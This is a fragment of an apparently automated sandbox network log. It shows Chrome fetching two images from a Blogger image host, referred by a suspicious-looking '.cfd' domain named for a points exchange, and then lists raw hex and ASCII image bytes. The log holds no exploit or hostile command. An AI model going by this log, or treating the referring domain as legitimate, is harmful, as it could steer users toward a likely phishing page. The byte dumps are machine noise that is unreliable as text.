                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:12 UTC483INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/jpeg
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73b"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:12 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="AddText_06-06-08.17.04.jpg"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 56391
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:12 UTC907INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 6c 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 03 00 31 01 02 00 07 00 00 00 32 00 00 00 12 02 03 00 02 00 00 00 02 00 02 00 69 87 04 00 01 00 00 00 3a 00 00 00 00 00 00 00 47 6f 6f 67 6c 65 00 00 03 00 00 90 07 00 04 00 00 00 30 32 32 30 02 a0 04 00 01 00 00 00 57 02 00 00 03 a0 04 00 01 00 00 00 ed 00 00 00 00 00 00 00 ff e2 02 28 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 18 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: JFIFlExifII*12i:Google0220W(ICC_PROFILE0mntrRGB XYZ acsp-
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: 13 31 22 41 51 09 14 61 81 91 92 d1 16 32 52 71 72 a1 d2 e2 15 23 42 43 62 c1 f0 17 19 53 63 a2 b1 e1 33 0a 24 25 26 27 f1 18 34 37 c2 1a 28 36 45 82 94 b2 d4 ff c4 00 1e 01 01 00 03 00 02 03 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a ff c4 00 57 11 00 01 03 02 04 02 05 06 08 08 0b 06 05 04 03 00 01 02 03 11 04 05 00 06 21 31 12 41 07 13 51 61 71 14 15 22 81 a1 f0 08 18 23 42 91 b1 c1 d1 16 32 52 53 54 62 92 e1 24 25 26 33 34 35 45 46 56 66 96 36 43 55 76 d6 f1 09 72 82 a2 d2 44 86 93 a6 b5 b6 c2 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 c0 f8 61 86 3f a2 0f 51 f6 7d fe f0 7b a7 f9 cf c3 0c 30 c3 d4 7d 9f 7f bc 1e e9 61 86 18 61 ea 3e cf bf de 0f 74 b0 c3 0c 41 bf 75 bd 62 ff 00 cc 62 01 24 09 11 ef e3 ef cf 12 e8 4c a8 2b 54 c2 67 7e
                                                                                                                            Data Ascii: 1"AQa2Rqr#BCbSc3$%&'47(6EW!1AQaq"#B2RSTb$%&345EFVf6CUvrD?a?Q}{0}aa>tAubb$L+Tg~
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: dd 28 ae 29 7d 74 75 34 f5 4d b1 5b 55 6f 5b 94 cf b7 50 81 59 44 ef 51 59 4a a5 36 4a 53 51 48 fc b1 52 c9 3c 6c 3c 95 34 e8 43 89 29 1c ea bb 6d 5d 09 69 35 6c 3d 4c b7 a8 e9 6b db 45 43 2e b2 b5 51 56 b5 d7 d2 55 04 ad 21 46 9e a5 af 94 a7 78 0e 07 db 87 1a 2b 6d 41 47 eb 86 32 b6 70 64 ae 61 64 35 55 0f 44 e6 6c b6 06 4f 53 45 d3 f2 4a ae 1e 5f 01 38 96 cf 1b f9 3d 51 42 26 2a 4f 1c f4 6c ad e7 e0 db 76 32 d1 28 10 ad bc f3 8d 79 b2 d4 f1 6f 5b 61 78 a7 d4 6f bd c5 b7 16 eb 71 dd 6b 1b f8 5b 7c 56 d5 78 b7 5f 2d f4 d7 6b 45 5d 2d ca db 58 16 aa 5a ea 1a 96 6a e9 2a 12 db ce d3 ad 4c d4 d3 2d d6 1d 48 79 97 5b 96 dc 50 e2 42 84 c8 20 72 2e 76 4a fb 2d 7d 4d ae ed 4d 53 6c b9 52 14 26 aa 86 be 99 ea 3a ca 72 b6 5a a8 40 7e 9a a1 2d bc ca 94 cb ed 38 12
                                                                                                                            Data Ascii: ()}tu4M[Uo[PYDQYJ6JSQHR<l<4C)m]i5l=LkEC.QVU!Fx+mAG2pdad5UDlOSEJ_8=QB&*Olv2(yo[axoqk[|Vx_-kE]-XZj*L-Hy[PB r.vJ-}MMSlR&:rZ@~-8
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: ba 86 78 70 92 9d 1b a4 a8 ee 92 ad 93 62 42 74 10 52 74 13 74 aa e9 0d 80 42 94 01 b9 05 ad ed 37 eb 25 fd b5 d4 e5 fb cd a6 fb 46 df 0a 57 55 68 b8 d2 d7 b6 87 56 4f 0b 6e 79 32 dc ea d4 52 95 14 85 28 15 70 ac 25 27 81 51 9d c2 cf 78 b3 3e 29 6f b6 8b 95 92 ac 93 14 b7 3a 2a 8a 37 88 4c 05 a8 25 f6 db 24 20 a8 05 46 dc 48 24 80 a0 71 1f cb 63 f5 8e a3 d5 86 32 7d 0f 93 f5 e6 63 d2 79 9d 5a 52 52 d8 08 ca 7f 27 69 61 5a 57 71 11 73 79 7c ba 26 59 4d 25 c8 84 bd 31 85 86 8a 5b 6f cd 4b 0a 87 7b 9a c4 1a 1d 7e c5 a6 f6 53 ad 03 8c 0d c1 52 4a 4d d2 48 55 8a 48 04 5b be fb 8d c1 07 a1 04 11 b1 18 de 9e e7 47 53 55 59 42 d5 45 3b b5 96 e5 d2 b5 70 a6 69 e4 ad fa 27 2b 69 51 59 48 9a a6 a1 2e d3 aa aa 99 62 a2 99 2f 21 b5 bd 4e 50 fa 51 d5 ad 24 e6 f5 ba a9
                                                                                                                            Data Ascii: xpbBtRttB7%FWUhVOny2R(p%'Qx>)o:*7L%$ FH$qc2}cyZRR'iaZWqsy|&YM%1[oK{~SRJMHUH[GSUYBE;pi'+iQYH.b/!NPQ$
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: 40 50 22 e7 63 d1 40 ea b9 04 5d 57 f9 a4 58 ed 71 6e 51 7d 20 c1 43 83 49 24 a6 20 18 82 41 32 06 b1 26 04 8d 09 c7 5c 92 a5 36 12 15 2a 27 f1 82 a7 62 09 d4 19 90 0c 46 f8 8c 31 02 e4 5c 0b f7 12 08 02 f7 22 dd a2 0d ce c6 dd 6c 45 fa e2 aa 58 49 21 56 49 1a 09 0a 20 28 a5 c2 43 5a 53 70 a5 17 48 d2 dd 81 0b 57 65 37 c5 45 4b 44 28 95 00 12 40 51 24 68 4e c0 8d f5 e5 a4 98 3a 63 92 a6 49 e0 21 cd 77 29 01 42 7f 16 41 02 74 df f1 a2 35 c5 f0 c6 41 af b2 be bd cb 43 4d 9a e6 93 9a 52 a9 ab a4 4d 54 b4 e7 e9 2e 4a 84 de 47 12 e1 43 33 18 55 b2 e3 80 b0 a5 1e 5a 52 bd 0e 02 83 ad 3a 82 c8 c7 a4 02 40 bf 66 e6 f6 00 f7 91 df 6d ff 00 6b a7 7e f6 56 c2 b4 b5 d4 95 ec a6 a6 86 a1 8a ca 75 97 12 8a 8a 67 9a 79 95 a9 a7 0b 4e 25 2e 21 65 2a 2d ba 95 b4 e0 04 f0
                                                                                                                            Data Ascii: @P"c@]WXqnQ} CI$ A2&\6*'bF1\"lEXI!VI (CZSpHWe7EKD(@Q$hN:cI!w)BAt5ACMRMT.JGC3UZR:@fmk~VugyN%.!e*-
                                                                                                                            2024-10-06 11:50:12 UTC1390INData Raw: fa f7 25 64 2b 2a f2 fd 1d 26 67 b6 59 1b bb 5e 7a 39 cc b9 e2 c7 53 6d 73 37 55 66 6f 36 d0 58 ae 77 8b 2d ca f0 fb 15 ff 00 81 d6 3b 5b 9e 6e 62 9d 09 ad a2 42 1f a7 71 61 fa 8a 7a d7 85 5a 78 59 95 bc 37 e5 40 c8 b6 38 87 cf fc cf a9 e8 aa 1e 71 5e 44 e5 f5 25 2a cb ca 41 8a da 7f 37 9e ca a1 dd 8e 9a 44 ce 53 36 8e 93 4a 64 70 d0 d0 c0 b4 c3 2f c4 ba eb eb 48 5a 79 a9 88 f3 63 89 f3 8e 8f e1 e6 57 2d a6 66 19 07 9a 15 cd 77 11 31 33 5f 94 92 9a f6 8a 82 a5 22 e4 2c 4b d2 cf 99 c4 32 e4 b2 6b 35 62 3d 33 52 62 1c 65 98 55 c4 08 36 da 5a e6 2f c2 a3 96 b7 72 76 48 71 19 9f 39 1f 47 c7 53 2c e5 b4 b7 33 b2 2e aa 9f be ec fe 81 cc 6a 26 3a a7 a0 a7 15 04 b8 bf 0e f4 5c 03 8c c2 95 ca a7 f0 ce 34 a4 39 15 2e 8e 85 71 6a 97 43 ad e6 1f 2c ba a5 e4 be 2c f2
                                                                                                                            Data Ascii: %d+*&gY^z9Sms7Ufo6Xw-;[nbBqazZxY7@8q^D%*A7DS6Jdp/HZycW-fw13_",K2k5b=3RbeU6Z/rvHq9GS,3.j&:\49.qjC,,
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 86 6e 15 72 c9 91 4b ac 25 2b e6 2c 12 a5 38 d7 8c f4 01 9d ab da ca 14 94 37 ba ea cc bf 69 c9 d9 16 ae f9 64 b4 06 69 9c fc 2b b5 9b e5 da a2 ff 00 99 9d 79 69 72 a6 a1 9b 43 f4 af 5a 58 b7 51 06 97 48 5d 45 5d c7 ab 76 e1 46 19 f2 7f 84 1e 4b a1 39 ca be eb 65 a1 a7 cc 77 3c d7 9d 68 ec 97 9b 92 5c ab 42 32 ad c4 65 eb 2b 76 3c b8 d5 2b 2b 4b 08 aa bb 30 fb 57 47 2e 15 e5 c6 6a 83 0e 50 da 94 ea 28 2b 9c 73 2c 51 59 35 c0 95 45 50 52 d4 2c cf 89 6c da 7e a9 a9 a2 65 f2 bf 94 b2 ac a0 62 0e 82 85 9d 4e 55 e6 f0 b0 eb 5c ce 6c d4 e9 10 ac 47 01 0a b7 7c c1 b6 cc 4a 9a 0b f3 78 67 12 f3 78 96 aa e1 8e 67 96 fc 59 a7 86 1a e2 67 a9 f8 7c c3 91 52 71 13 f9 4f 24 79 f4 9e 7a e4 33 f2 b9 ac 23 0a 72 25 30 91 13 49 64 7c 14 4b 70 f1 0e 29 72 f5 3c a4 c4 b6 bd
                                                                                                                            Data Ascii: nrK%+,87idi+yirCZXQH]E]vFK9ew<h\B2e+v<++K0WG.jP(+s,QY5EPR,l~ebNU\lG|JxgxgYg|RqO$yz3#r%0Id|Kp)r<
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: d0 e4 6f ab 2c b9 db 39 e6 ac bd d1 26 5a b9 e7 cb ae 5e a7 cc 79 9b a5 0c bd 7b ce 74 cb b7 51 dd ab 5c c8 f5 6b fc 15 b5 3b 5b 51 4c b6 69 6e 57 b4 20 f5 f5 2d 36 d5 55 c0 d1 ba 86 01 75 6b 50 f6 65 ef 27 64 9c af 79 e9 47 35 d1 e4 9b 3d f2 a6 c1 93 3a 2c cd 76 3c 93 5a 6e 75 56 6a 04 e7 ba 0a 67 33 65 e1 14 b4 55 b4 d5 55 76 6c b6 fd 43 6d b1 4c ed 53 b4 b4 22 e3 4a ba a7 0a 12 d7 17 10 38 c2 e0 ef 2b b2 f3 2a e8 0e 27 38 67 aa 6a 0a d3 87 bc c5 8d 76 50 96 ea 94 a1 ca 8a 91 9a 91 10 da 20 a6 ae 2c 33 17 15 0f 17 1d 05 33 97 a5 2f c0 b7 13 0b 19 02 e3 2f a5 70 ae 42 c5 bd c9 78 5e 10 f8 1a a1 f8 5e e1 cf 89 9c fa a8 73 16 9a 97 d7 b2 27 5a 9f 53 74 74 63 b3 19 8d 7f 55 45 c5 ba 60 1a a7 e1 de 86 88 5d 3d 05 2e 97 48 e6 11 d3 26 79 81 11 0d 4d 4c 3b 2f
                                                                                                                            Data Ascii: o,9&Z^y{tQ\k;[QLinW -6UukPe'dyG5=:,v<ZnuVjg3eUUvlCmLS"J8+*'8gjvP ,33//pBx^^s'ZSttcUE`]=.H&yML;/
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 66 19 94 85 e8 62 1d 96 1a 42 d7 af 96 d3 4c b6 db 69 49 de c9 09 48 01 37 51 48 00 15 13 72 7c bf 2e 35 99 33 c7 4b 39 fb af cf 99 ae d3 97 32 65 5f 46 77 0b 7e 58 b1 3d 4d 4b 69 72 be f3 93 ad d7 8b c5 be e9 e5 34 35 8f 2a d2 f5 5b 15 2c 3f 6e a5 7e 91 4e b9 52 f2 cb c9 79 05 c3 e2 99 82 ab 2d e4 ee 89 f2 03 94 99 0f 28 dd b3 06 74 b7 f4 99 41 71 cd 77 a4 d5 57 5d 13 45 67 ce b7 2b 15 aa ba da 8a 4a ea 2a 74 5d a9 58 4d 3a d9 ba 55 d3 56 f5 61 84 b4 86 90 da f8 0e ec a1 34 fc b9 a2 ae 41 bd 5f 4c da c9 b8 25 33 a8 12 2c 13 d2 c7 b5 7d 80 02 ea d8 28 9f 43 5e 53 5e 03 f8 98 e2 5b 88 76 f3 13 29 68 49 74 fe 93 67 2f 29 4a 74 4d 23 ab 2a 66 4c b5 cc 60 62 66 91 31 0d a6 5d 1b 18 a9 a8 f3 41 1d 0e 35 c6 43 32 d4 4a 9c 52 60 96 86 db 5b ea f3 d1 43 b6 a5 d6
                                                                                                                            Data Ascii: fbBLiIH7QHr|.53K92e_Fw~X=MKir45*[,?n~NRy-(tAqwW]Eg+J*t]XM:UVa4A_L%3,}(C^S^[v)hItg/)JtM#*fL`bf1]A5C2JR`[C
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 14 74 54 8e 30 d5 2b ab b8 dc 69 c3 3e 43 67 cb 16 bb 8f 45 56 4c c7 52 cf 9f 33 0e 59 cb 9d 20 3f 62 c9 21 d5 b2 fd 4b 8d e7 ca 85 de f3 3d 63 1f 24 f5 7d b7 2a d0 d4 b7 58 2d 34 0f aa be ba b5 8a 85 55 34 dd ae db 56 a7 78 4b 93 b4 8f 0e d3 56 2a 39 9e 7d e6 f5 63 97 cd ca ff 00 43 b5 4e 52 d4 25 04 e5 69 51 55 6b 8f 4c 5a 66 51 a2 66 fc 54 04 86 4b 07 28 72 16 16 20 b3 1a f8 72 35 99 8c 3a e1 1f 75 28 75 d4 66 3c dc e1 a7 27 e0 f8 7c 6b 89 4e 1f 33 42 a8 af a8 88 4a f9 ac b4 aa e4 35 ed 33 0d 48 d5 f4 b5 43 1b 00 d4 ce 57 18 ec 24 b6 3a 65 0d 15 2d 98 30 16 84 29 d5 42 f3 08 21 87 5c 74 82 8c a7 47 64 d6 52 64 c7 08 79 5f c4 dc f7 25 97 c4 4d 61 9a d5 44 e2 57 03 26 aa 1d 9d c4 d0 d4 13 32 45 4c 25 c1 9a 8e 49 29 4a dd 9c 45 cc 22 95 cf 87 44 74 64 1b
                                                                                                                            Data Ascii: tT0+i>CgEVLR3Y ?b!K=c$}*X-4U4VxKV*9}cCNR%iQUkLZfQfTK(r r5:u(uf<'|kN3BJ53HCW$:e-0)B!\tGdRdy_%MaDW&2EL%I)JE"Dtd


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            57192.168.2.649797172.217.18.14436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:12 UTC916OUTGET /img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:13 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73c"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:12 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (4).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:12 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1382333
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:13 UTC910INData Raw: 47 49 46 38 39 61 58 02 b3 03 f7 00 00 00 4c b7 00 7d f6 00 ff 00 01 22 52 02 35 81 02 7d da 02 87 ee 03 58 d1 03 82 e1 03 a0 fb 04 19 39 04 1b 41 05 18 36 05 67 b2 05 8d f2 06 91 f7 07 9a e0 08 8a ec 09 ab fd 0b 89 e5 0b 95 f8 0c 8b eb 0c 8c eb 0c 8d ed 0c 8e e8 0d 8b e8 0d 8c e8 0d 8d e9 0d 90 f1 0e 8b e8 0e 8c e7 0f 8b e9 0f 8c e9 0f 8d e6 10 52 b8 10 82 d7 10 87 de 10 8a e3 10 8b e5 10 8b e7 11 79 cf 11 8a e4 13 8e e9 14 8a e5 17 89 dc 18 20 2f 19 85 d9 1a 22 2e 1b 8f e3 1d 7b c4 1e 5f 92 1e 93 ea 1e 9e fb 20 2b 36 20 6d a5 20 78 c9 20 7e c7 21 81 ca 22 96 ec 24 6e d5 25 84 ca 26 89 d3 27 98 ea 29 31 37 2a 2f 76 2c 9a ed 2f 7d b8 31 92 d7 34 36 3a 34 50 67 37 7a ab 37 94 c9 37 9f ed 38 48 54 39 ab fc 3c b7 fe 3f a3 ee 40 5d 73 42 a6 f0 43 9d e1 44 a3
                                                                                                                            Data Ascii: GIF89aXL}"R5}X9A6gRy /".{_ +6 m x ~!"$n%&')17*/v,/}146:4Pg7z778HT9<?@]sBCD
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 30 63 b6 fc 40 b3 a6 4d 9b 32 73 36 bc 79 42 a7 cf 81 3c 7f ae bc a0 e2 42 05 a1 48 93 2a 5d ca 32 a2 d3 a7 10 3d 82 14 49 b5 aa d5 ab 58 b1 86 d8 ca 95 a9 d7 af 60 c3 2e ac 79 02 67 41 0b 20 2e 58 58 8b d6 20 d7 ae 4c 79 d2 24 88 16 aa 58 81 72 3f dc 1d 78 21 ed d7 b7 7b 03 0b 2e 08 15 2a 45 a9 1f 13 23 5e ac b8 31 e3 a9 59 3f be 0d 31 b8 b2 e5 cb 0a 3f 94 2d ab f7 2c db cf 6e 27 7b 25 ab d9 60 dd a7 7b 49 f7 c4 bc 74 32 5c d6 b0 7f 16 7e 4a 31 b2 ed db b8 5d c7 de cd fb eb cd ce a6 d9 22 d4 1d d7 e6 ea b6 20 4e 3b 4d 6d bc 37 52 c0 ce a3 b7 9c ed f4 70 62 dc d8 b3 13 97 ce bd fb 4e 9a 9c e7 1e ff 04 7d 70 bb d2 bc 74 41 d8 bd 8b de fb 4b e8 ee e3 13 a6 0e 31 e4 63 c7 f8 ef eb cf 2f 19 be fc ff dd fd 26 5e 70 6b 0d 27 5a 71 e0 71 86 1c 5a 14 2d c7 9e 71
                                                                                                                            Data Ascii: 0c@M2s6yB<BH*]2=IX`.ygA .XX Ly$Xr?x!{.*E#^1Y?1?-,n'{%`{It2\~J1]" N;Mm7RpbN}ptAK1c/&^pk'ZqqZ-q
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: b9 d1 8e 62 91 99 26 8c 85 2b 58 21 0b 68 4a 73 06 de 2a a3 f6 1a b7 32 15 68 72 ab c3 ba 59 10 6b b9 32 ed a9 60 06 85 55 27 ae 66 26 3b 93 a1 8c 2b 25 08 c1 3d 65 39 81 ce 86 40 5d 02 f9 d5 bf 06 b2 01 94 81 20 04 1b a0 ea 50 29 85 26 d2 fa ec 77 17 6b 9b 5a f7 85 12 18 ff c0 60 08 79 b0 5f 2b 5c d1 8a 58 d4 e2 b7 cb 14 e9 31 87 4b dc 63 a2 70 a4 2a 84 a6 2b e8 20 04 d9 19 6e 05 26 58 9a 1b 2d f0 01 9b 66 80 3c 47 b9 e5 4d 64 b7 02 03 36 ae 26 92 83 d9 e2 d4 a9 ce a3 35 ed bc 18 88 40 48 2e d0 4e c5 09 91 26 11 8c 08 d3 54 e0 20 3c 42 cc 82 04 59 23 e6 62 4b b4 d9 b6 aa 03 6c 9d 80 1e 2e a1 c2 fb 45 72 91 8f 84 85 71 79 3b dc fb d9 ef c1 0e 4e 45 2a 56 28 8b 49 a4 01 06 2b 00 66 49 3e 00 60 15 38 c0 00 c0 0c 31 30 29 6a b5 0b 88 96 2c 26 21 c8 60 49 80
                                                                                                                            Data Ascii: b&+X!hJs*2hrYk2`U'f&;+%=e9@] P)&wkZ`y_+\X1Kcp*+ n&X-f<GMd6&5@H.N&T <BY#bKl.Erqy;NE*V(I+fI>`810)j,&!`I
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: d0 05 2f 27 3d a5 70 93 23 e0 02 2c a0 03 8e 00 0a b4 f0 0a aa 90 08 5a 73 53 1c c6 1e 25 a7 4b e6 b8 95 59 c2 53 82 c7 02 6d 90 09 a0 20 6d d4 f3 8e cd 15 02 42 30 04 46 20 04 3c c0 03 d7 c1 8f 30 90 32 2b 23 77 1c e0 03 79 30 52 f6 33 81 ac b0 7d ab 84 89 be 27 0b 7a 80 05 10 00 01 0f c0 01 23 c0 02 78 d0 93 a0 20 08 24 90 02 54 e1 00 11 80 07 93 00 4d 25 c8 03 37 50 98 da 53 05 83 70 0b bb 55 0a 41 90 03 a9 a5 3d d9 14 7d 8b e7 07 3d d0 03 72 f3 00 01 50 05 84 20 81 ae 30 0a 3e 10 94 15 d0 4d 1f 66 07 04 46 0b 25 38 91 2c a5 9a 9a 69 0b b3 e0 87 50 90 03 17 e0 00 2e c3 1c b3 c6 95 6f e3 5f 8c c2 53 2c 50 35 3c 90 07 d0 43 0b c2 05 4d 7a 20 05 39 86 67 33 20 5d 4b b3 7c 99 25 97 2a 43 14 ea f6 88 51 ff 67 42 b6 40 42 76 60 04 47 43 13 b0 63 09 aa 00 4d
                                                                                                                            Data Ascii: /'=p#,ZsS%KYSm mB0F <02+#wy0R3}'z#x $TM%7PSpUA=}=rP 0>MfF%8,iP.o_S,P5<CMz 9g3 ]K|%*CQgB@Bv`GCcM
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 8c 3c b7 a9 18 c9 58 99 b7 34 53 c9 e8 8c 24 44 2a 36 62 97 65 9e bc c4 3d b5 02 4c 07 bf f0 ab bb 01 c0 91 7f 93 cf 34 a0 9a 76 29 cc 2a 44 c7 a5 60 83 fd fb 01 eb 39 6c 81 09 3b 1c 40 03 68 40 7f 2c b8 08 6b 80 bb 9e 26 12 00 2a 42 fe 43 61 0f 58 60 ac 80 cc 2d 05 02 82 d6 c1 48 07 06 72 53 37 b5 14 cd 94 30 cd c7 bb 85 19 56 c8 14 b6 42 d0 04 cc c4 16 ce 42 50 af b1 24 c9 75 ff 92 ce 36 cd 24 68 d4 01 2a a0 04 cb b3 45 23 58 75 46 e8 ac 59 83 61 34 51 ae c1 44 03 67 40 07 79 40 08 b7 cc d4 68 70 06 2e 97 0b b1 a0 42 89 84 0a 9a 90 88 d9 14 bf cf 9a 7e 90 50 08 79 80 07 78 70 cb 71 35 61 a7 c0 06 42 20 46 4a 88 01 10 80 01 00 0a 7c c3 c8 07 76 00 d7 76 60 07 7a 10 08 a6 b0 b0 e7 19 02 1b bd 34 1d ac c7 20 fc 00 75 b3 34 24 3d cd 1c ba 85 84 8c cd b2 b0
                                                                                                                            Data Ascii: <X4S$D*6be=L4v)*D`9l;@h@,k&*BCaX`-HrS70VBBP$u6$h*E#XuFYa4QDg@y@hp.B~Pyxpq5aB FJ|vv`z4 u4$=
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: d3 b1 62 a1 56 ad fa b4 ab 59 b3 64 c9 b2 e5 e8 08 ff 8f 10 18 42 94 60 51 42 67 08 15 24 48 14 95 88 b2 a9 ce 94 8b 2d e6 2e e1 72 45 09 0c d1 43 98 48 91 55 b3 4e 15 12 53 9a d0 99 02 c6 45 ea 2c 76 9e a8 50 e1 84 8a 9c d0 4b 1a 27 fa dc 43 f4 0d c5 cf af c7 be 1e ab 8a ef 25 40 9c e5 d9 bf 2f 4f cb 0e 03 10 b0 0c 32 d0 e0 40 04 03 54 70 41 06 19 e4 8a 31 c7 1a 6b 70 a4 bd 2a b4 f0 42 bb f2 ca 0b 43 0e 3b f4 b0 c2 0b 62 0a 29 80 3a 28 99 cd 95 54 4a 13 0d 34 d1 56 04 2d 34 57 40 ab a5 16 d1 62 81 f1 15 59 20 59 43 a7 e8 4a f0 91 37 16 bc 8a e0 02 c5 20 9a a0 a8 b2 40 d0 20 37 0e b2 2b e9 82 08 76 db 0d 03 07 20 c0 40 a2 9f 54 b8 40 05 0b 04 32 21 af e8 3c 80 49 05 9e 18 82 68 05 15 4a 80 20 04 0d 10 2a 6a 05 13 3c c0 6a 03 99 9e 22 ca 05 f1 d6 93 e8 a2
                                                                                                                            Data Ascii: bVYdB`QBg$H-.rECHUNSE,vPK'C%@/O2@TpA1kp*BC;b):(TJ4V-4W@bY YCJ7 @ 7+v @T@2!<IhJ *j<j"
                                                                                                                            2024-10-06 11:50:13 UTC1390INData Raw: 72 ad 7b dd f9 f5 e4 4b cf a5 64 74 4d ea af ea 62 57 bc e3 e5 5a 55 fb c3 d5 da 16 f7 b6 bc e5 17 72 c9 fb de 0c 8d f5 ba 1b da cb 4f e9 45 dc 91 1a 17 9e 73 cd ea 6a 53 6b 5a ec 4a 56 bc 7e b5 2e 7d 27 fa 5d da 02 18 9f 9a 45 6f 61 1b e5 de 04 73 ef bd 02 0e b0 7c 0b 4c e1 76 de 56 86 f8 05 a9 7e 1b 2c 61 ba 6a 38 b1 0e be 30 81 2b 8c e1 de 9a 98 2e 5a f9 f0 63 17 cc d9 0f 57 2a b0 89 e2 ef 7c 3d 3a 61 0b 2f 37 c7 72 d1 2f 87 39 ea 61 c7 2a f6 c1 fe 1d 31 88 4f bc e3 12 1b b8 c4 15 ff aa 6b 90 15 cc 4e 20 97 d6 c8 43 6e 72 8c e1 8b 62 f8 66 19 2c 2a ee 6d 94 55 5b 65 2d 87 59 cc 7b e1 f2 6b bd ac 5b e9 8e 39 cb 34 7d 2f 4d d7 f9 16 c7 5c a4 71 c9 65 f0 d7 58 b7 66 9c aa 59 cf 73 29 b3 6b cf 4c 5d 22 ef 59 d0 83 c6 0b 92 cd bc 5e d6 52 77 b7 89 26 74 a3
                                                                                                                            Data Ascii: r{KdtMbWZUrOEsjSkZJV~.}']Eoas|LvV~,aj80+.ZcW*|=:a/7r/9a*1OkN Cnrbf,*mU[e-Y{k[94}/M\qeXfYs)kL]"Y^Rw&t
